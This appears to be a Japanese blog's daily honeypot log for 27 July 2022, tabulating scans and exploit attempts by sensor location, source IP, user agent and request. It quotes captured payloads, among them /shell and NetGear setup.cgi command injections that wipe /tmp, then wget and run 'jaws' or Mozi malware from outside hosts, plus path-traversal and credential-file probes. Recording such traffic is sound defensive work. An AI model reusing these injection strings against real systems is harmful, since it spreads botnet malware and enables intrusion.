2022/07/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/07/27分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget  rischyo.cf/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 7.7.7.7/jaws;
sh /tmp/jaws

Location:US

.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws

Location:SG

phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：88 (前日比：-279)
US：総アクセス数：236 (前日比：-142)
UK：総アクセス数：181 (前日比：134)
SG：総アクセス数：123 (前日比：60)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.145.4.190	United States
1	27.215.178.119	China
1	42.202.103.147	China
1	42.237.24.91	China
8	52.23.226.134	United States
1	95.161.131.235	Antigua and Barbuda
16	95.214.235.205	Ukraine
1	103.60.60.186	Singapore
1	107.182.129.137	United States
1	108.170.31.55	United States
2	109.237.103.9	Russia
10	135.125.217.54	France
7	135.125.244.48	France
2	143.92.32.136	Singapore
2	143.92.32.144	Singapore
1	143.92.32.148	Singapore
1	143.92.32.170	Singapore
3	163.123.143.71	United States
1	172.104.138.223	United States
4	178.62.52.193	United States
1	183.90.187.27	Hong Kong
14	185.7.214.104	Hong Kong
2	185.162.235.157	Russia
1	193.142.59.214	Germany
1	201.150.182.185	Bolivia
1	205.210.31.143	United States
1	210.209.225.174	Taiwan
1	212.23.222.167	Poland
1	212.103.61.71	Germany

UserAgent一覧

件数	UserAgent
13	`-`
3	`Go-http-client/1.1`
1	`Hello, world`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
37	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`\x16\x03\x01\x01D\x01`
6		`\x16\x03\x01`
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
38	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
6	GET	`/map/baidumap.xml`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]215[.]178[.]119:38367/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]202[.]103[.]147:41013/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+7[.]7[.]7[.]7/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.22.235.38	United States
1	14.224.163.63	Vietnam
87	18.231.198.221	United States
87	43.200.191.239	United States
8	46.249.32.126	Netherlands
9	51.79.29.48	Canada
2	52.12.1.57	United States
1	95.161.131.235	Antigua and Barbuda
1	107.182.129.137	United States
2	109.237.103.9	Russia
4	134.122.135.64	Singapore
1	137.184.88.136	United States
1	143.92.32.36	Singapore
2	143.92.32.46	Singapore
1	143.198.129.219	United States
1	162.142.125.7	United States
1	162.142.125.222	United States
2	163.123.143.71	United States
2	165.232.141.181	United States
1	181.214.206.161	United States
11	185.7.214.104	Hong Kong
6	185.254.196.223	Ukraine
1	192.241.219.116	United States
2	194.165.16.11	Panama
1	205.210.31.18	United States

UserAgent一覧

件数	UserAgent
15	`-`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
174	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
2	GET	`/.aws/credentials`	HTTP/1.1
2	GET	`/.config/gatsby/config.json`	HTTP/1.1
2	GET	`/.cordova/config.json`	HTTP/1.1
2	GET	`/.deployment-config.json`	HTTP/1.1
2	GET	`/.docker/.env`	HTTP/1.1
2	GET	`/.docker/config.json`	HTTP/1.1
2	GET	`/.docker/daemon.json`	HTTP/1.1
2	GET	`/.docker/laravel/app/.env`	HTTP/1.1
2	GET	`/.env.backup`	HTTP/1.1
2	GET	`/.env.bak`	HTTP/1.1
2	GET	`/.env.dev`	HTTP/1.1
2	GET	`/.env.development.local`	HTTP/1.1
2	GET	`/.env.dist`	HTTP/1.1
2	GET	`/.env.docker.dev`	HTTP/1.1
2	GET	`/.env.local`	HTTP/1.1
2	GET	`/.env.php`	HTTP/1.1
2	GET	`/.env.prod`	HTTP/1.1
2	GET	`/.env.production.local`	HTTP/1.1
2	GET	`/.env.sample.php`	HTTP/1.1
2	GET	`/.env.save`	HTTP/1.1
2	GET	`/.env.stage`	HTTP/1.1
2	GET	`/.env.test.localapi/.env`	HTTP/1.1
2	GET	`/.env.test`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
2	GET	`/.environment`	HTTP/1.1
2	GET	`/.envrc`	HTTP/1.1
2	GET	`/.envs`	HTTP/1.1
2	GET	`/.env~`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
2	GET	`/.gitlab-ci/.env`	HTTP/1.1
2	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
2	GET	`/.lanproxy/config.json`	HTTP/1.1
2	GET	`/.msmtprc`	HTTP/1.1
2	GET	`/.s3cfg`	HTTP/1.1
2	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`//PMA/scripts/setup.php`	HTTP/1.1
1	GET	`//admin/scripts/setup.php`	HTTP/1.1
1	GET	`//dbadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//mysql/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//webdav/wickd.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
2	GET	`/app/config.yml`	HTTP/1.1
2	GET	`/app/config/parameters.yml`	HTTP/1.1
2	GET	`/asdf.php`	HTTP/1.1
2	GET	`/beta/.env`	HTTP/1.1
2	GET	`/config.env`	HTTP/1.1
2	GET	`/config.js`	HTTP/1.1
2	GET	`/config.json`	HTTP/1.1
2	GET	`/config/config.js`	HTTP/1.1
2	GET	`/config/config.json`	HTTP/1.1
2	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/console/base/config.json`	HTTP/1.1
2	GET	`/console/payments/config.json`	HTTP/1.1
2	GET	`/dashboard/phpinfo.php`	HTTP/1.1
2	GET	`/database.yml`	HTTP/1.1
2	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/env.backup`	HTTP/1.1
2	GET	`/env.config.js`	HTTP/1.1
2	GET	`/env.js`	HTTP/1.1
2	GET	`/frontend_dev.php/$`	HTTP/1.1
2	GET	`/i.php`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/info.json`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
2	GET	`/infophp.php`	HTTP/1.1
2	GET	`/infos.php`	HTTP/1.1
2	GET	`/js/config.js`	HTTP/1.1
2	GET	`/js/envConfig.js`	HTTP/1.1
2	GET	`/kyc/.env`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
2	GET	`/laravel/core/.env`	HTTP/1.1
2	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
2	GET	`/mailer/.env`	HTTP/1.1
7	GET	`/map/baidumap.xml`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
2	GET	`/old_phpinfo.php`	HTTP/1.1
2	GET	`/php-info.php`	HTTP/1.1
2	GET	`/php.ini`	HTTP/1.1
2	GET	`/php.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
2	GET	`/phpversion.php`	HTTP/1.1
2	GET	`/pinfo.php`	HTTP/1.1
2	GET	`/prod/.env`	HTTP/1.1
2	GET	`/public/.env`	HTTP/1.1
2	GET	`/secrets.yml`	HTTP/1.1
2	GET	`/server/config.json`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/temp.php`	HTTP/1.1
2	GET	`/test.php`	HTTP/1.1
2	GET	`/time.php`	HTTP/1.1
2	GET	`/twitter/.env`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/wp-config.php-backup`	HTTP/1.1
2	GET	`/wp-config.php.bak`	HTTP/1.1
2	GET	`/wp-config.php.old`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.14.97.133	United States
1	20.79.248.176	United States
1	20.187.116.218	United States
1	61.52.54.178	China
2	62.171.159.235	Germany
1	64.62.197.43	United States
4	71.6.167.142	United States
1	77.83.36.23	Ukraine
2	80.66.88.211	Russia
1	95.161.131.235	Antigua and Barbuda
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	112.164.204.29	South Korea
1	117.210.153.60	India
1	120.83.73.174	China
1	125.41.6.53	China
3	143.92.32.144	Singapore
2	143.92.32.170	Singapore
2	143.92.35.7	Singapore
3	163.123.143.71	United States
1	167.94.138.60	United States
1	181.214.206.161	United States
14	185.7.214.104	Hong Kong
125	188.241.156.154	United Kingdom
1	199.101.170.12	Canada
1	205.210.31.142	United States
4	207.154.225.183	United States

UserAgent一覧

件数	UserAgent
20	`-`
3	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
126	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`SSH-2.0-libssh2_1.9.0`
2		`\x03`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	CONNECT	`www[.]google[.]com:443`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
3	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
2	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/config`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/api/`	HTTP/1.1
1	GET	`/api/config`	HTTP/1.1
1	GET	`/api`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/app/`	HTTP/1.1
1	GET	`/app/config`	HTTP/1.1
1	GET	`/app`	HTTP/1.1
1	GET	`/backend/.git/config`	HTTP/1.1
1	GET	`/backend/`	HTTP/1.1
1	GET	`/backend/config`	HTTP/1.1
1	GET	`/backend`	HTTP/1.1
1	GET	`/backup/.git/config`	HTTP/1.1
1	GET	`/backup/`	HTTP/1.1
1	GET	`/backup/config`	HTTP/1.1
1	GET	`/backup`	HTTP/1.1
1	GET	`/bak/.git/config`	HTTP/1.1
1	GET	`/bak/`	HTTP/1.1
1	GET	`/bak/config`	HTTP/1.1
1	GET	`/bak`	HTTP/1.1
1	GET	`/cfg/.git/config`	HTTP/1.1
1	GET	`/cfg/`	HTTP/1.1
1	GET	`/cfg/config`	HTTP/1.1
1	GET	`/cfg`	HTTP/1.1
1	GET	`/conf/.git/config`	HTTP/1.1
1	GET	`/conf/`	HTTP/1.1
1	GET	`/conf/config`	HTTP/1.1
1	GET	`/conf`	HTTP/1.1
1	GET	`/config/.git/config`	HTTP/1.1
1	GET	`/config/`	HTTP/1.1
1	GET	`/config/config`	HTTP/1.1
2	GET	`/config`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/cron/`	HTTP/1.1
1	GET	`/cron`	HTTP/1.1
1	GET	`/data/.git/config`	HTTP/1.1
1	GET	`/data/`	HTTP/1.1
1	GET	`/data/config`	HTTP/1.1
1	GET	`/data`	HTTP/1.1
1	GET	`/download/`	HTTP/1.1
1	GET	`/download`	HTTP/1.1
1	GET	`/downloads/`	HTTP/1.1
1	GET	`/downloads`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/files`	HTTP/1.1
1	GET	`/git/.git/config`	HTTP/1.1
1	GET	`/git/`	HTTP/1.1
1	GET	`/git/config`	HTTP/1.1
1	GET	`/git`	HTTP/1.1
1	GET	`/inc/.git/config`	HTTP/1.1
1	GET	`/inc/`	HTTP/1.1
1	GET	`/inc/config`	HTTP/1.1
1	GET	`/inc`	HTTP/1.1
1	GET	`/include/.git/config`	HTTP/1.1
1	GET	`/include/`	HTTP/1.1
1	GET	`/include/config`	HTTP/1.1
1	GET	`/include`	HTTP/1.1
1	GET	`/includes/.git/config`	HTTP/1.1
1	GET	`/includes/`	HTTP/1.1
1	GET	`/includes/config`	HTTP/1.1
1	GET	`/includes`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/lib/.git/config`	HTTP/1.1
1	GET	`/lib/`	HTTP/1.1
1	GET	`/lib/config`	HTTP/1.1
1	GET	`/lib`	HTTP/1.1
1	GET	`/libs/.git/config`	HTTP/1.1
1	GET	`/libs/`	HTTP/1.1
1	GET	`/libs/config`	HTTP/1.1
1	GET	`/libs`	HTTP/1.1
1	GET	`/log/`	HTTP/1.1
1	GET	`/log`	HTTP/1.1
1	GET	`/logs/`	HTTP/1.1
1	GET	`/logs`	HTTP/1.1
7	GET	`/map/baidumap.xml`	HTTP/1.1
1	GET	`/phpMyAdmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/rest/.git/config`	HTTP/1.1
1	GET	`/rest/`	HTTP/1.1
1	GET	`/rest/config`	HTTP/1.1
1	GET	`/rest`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/service/.git/config`	HTTP/1.1
1	GET	`/service/`	HTTP/1.1
1	GET	`/service/config`	HTTP/1.1
1	GET	`/service`	HTTP/1.1
1	GET	`/services/.git/config`	HTTP/1.1
1	GET	`/services/`	HTTP/1.1
1	GET	`/services/config`	HTTP/1.1
1	GET	`/services`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//120[.]83[.]73[.]174:57499/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/source/.git/config`	HTTP/1.1
1	GET	`/source/`	HTTP/1.1
1	GET	`/source/config`	HTTP/1.1
1	GET	`/source`	HTTP/1.1
1	GET	`/sources/.git/config`	HTTP/1.1
1	GET	`/sources/`	HTTP/1.1
1	GET	`/sources/config`	HTTP/1.1
1	GET	`/sources`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/src/`	HTTP/1.1
1	GET	`/src/config`	HTTP/1.1
1	GET	`/src`	HTTP/1.1
1	GET	`/svc/.git/config`	HTTP/1.1
1	GET	`/svc/`	HTTP/1.1
1	GET	`/svc/config`	HTTP/1.1
1	GET	`/svc`	HTTP/1.1
1	GET	`/temp/.git/config`	HTTP/1.1
1	GET	`/temp/`	HTTP/1.1
1	GET	`/temp/config`	HTTP/1.1
1	GET	`/temp`	HTTP/1.1
1	GET	`/test/.git/config`	HTTP/1.1
1	GET	`/test/`	HTTP/1.1
1	GET	`/test/config`	HTTP/1.1
1	GET	`/test`	HTTP/1.1
1	GET	`/tmp/.git/config`	HTTP/1.1
1	GET	`/tmp/`	HTTP/1.1
1	GET	`/tmp/config`	HTTP/1.1
1	GET	`/tmp`	HTTP/1.1
1	GET	`/upload/`	HTTP/1.1
1	GET	`/upload`	HTTP/1.1
1	GET	`/uploads/`	HTTP/1.1
1	GET	`/uploads`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wallet/`	HTTP/1.1
1	GET	`/wallet`	HTTP/1.1
1	GET	`/wallets/`	HTTP/1.1
1	GET	`/wallets`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
42	20.127.188.34	United States
1	20.199.114.17	United States
12	51.79.29.48	Canada
3	51.89.199.116	France
2	51.195.39.40	France
1	51.195.187.154	France
1	60.188.209.137	China
1	95.161.131.235	Antigua and Barbuda
2	101.200.79.217	China
2	102.67.226.28	Ivory Coast
1	108.170.31.55	United States
2	109.237.103.9	Russia
1	124.64.218.208	China
3	134.122.132.6	Singapore
1	137.184.33.230	United States
1	143.92.35.7	Singapore
1	143.198.129.219	United States
1	147.182.255.203	United States
2	162.142.125.10	United States
3	163.123.143.71	United States
1	167.94.138.47	United States
1	167.94.138.62	United States
1	172.104.138.223	United States
4	178.62.52.193	United States
13	185.7.214.104	Hong Kong
8	185.254.196.223	Ukraine
1	192.241.206.164	United States
1	193.56.29.120	United Kingdom
2	194.165.16.72	Panama
1	198.235.24.151	United States
1	202.84.44.227	Bangladesh
1	205.210.31.25	United States
5	216.83.53.34	United States

UserAgent一覧

件数	UserAgent
13	`-`
3	`Go-http-client/1.1`
1	`Hello, World`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0`
1	`Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 920) like Gecko`
72	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
2	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
4		`\x16\x03\x01`
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.prod.local`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
33	GET	`/.env`	HTTP/1.1
1	GET	`/?%3Cplay%3Ewithme%3C/%3E`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?pp=env`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/acme-challenge/.env`	HTTP/1.1
1	GET	`/acme_challenges/.env`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/bootstrap/.env`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
2	GET	`/config/.env`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/core/.env`	HTTP/1.1
1	GET	`/core/app/.env`	HTTP/1.1
1	GET	`/doc/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/docker/app/.env`	HTTP/1.1
1	GET	`/dotfiles/.env`	HTTP/1.1
1	GET	`/en/.env`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/js/.env`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
